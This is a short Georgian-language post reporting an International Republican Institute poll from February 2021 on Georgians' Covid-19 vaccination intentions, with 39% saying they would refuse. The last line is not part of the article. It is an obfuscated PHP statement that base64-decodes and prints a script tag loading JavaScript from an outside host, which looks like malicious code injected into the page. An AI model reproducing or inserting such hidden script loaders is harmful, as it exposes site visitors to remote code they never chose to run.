celsiusi
ავერსი შნაიდერი
საერთაშორისო რესპუბლიკური ინსტიტუტის მიერ გამოქვეყნებული სოცლიოლოგიური კვლევის შედეგები გამოქვეყნა სადაც 39 % აცრაზე უარს ამბობს.
 
კითხვაზე "მას შემდეგ, რაც Covid-19-ის ვაქცინა ხელმისაწვდომი გახდება და ვაქცინაციის პროცესი დაიწყება, რა იქნება თქვენი გადაწყვეტილება აცრასთან დაკავშირებით?" პასუხები შემდეგნაირად გადანაწილდა:
 
39% - არ ავიცრები;
24% - ავიცრები რაღაც დროის გასვლის შემდეგ;
20% - ავიცრები, როგორც კი ვაქცინა ხელმისაწვდომი იქნება ჩემთვის;
6% - ავიცრები მხოლოდ იმ შემთხვევაში, თუ კანონი ან ჩემი დამსაქმებელი აცრას მოითხოვს;
1%-ზე ნაკლები - სხვა.
12% - არ ვიცი/უარი პასუხზე.
 
ცნობისთვის, კვლევა, რომელიც  პანდემიის ფონზე საქართველოს მოსახლეობის განწყობას ასახავს. ჩატარდა 2021 წლის 2-26 თებერვლის პერიოდში. შერჩევა მოიცავდა საარჩევნო ხმის უფლებისა და ასაკის მქონე 1500 რესპონდენტს. მონაცემები შეწონილ იქნა ასაკის, გენდერის, რეგიონისა და დასახლების ზომის შესაბამისად. ცდომილების ზღვარი წარმოადგენს +/- 2.5 პროცენტს, გამოპასუხების მაჩვენებელი – 75%.
 
1552
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");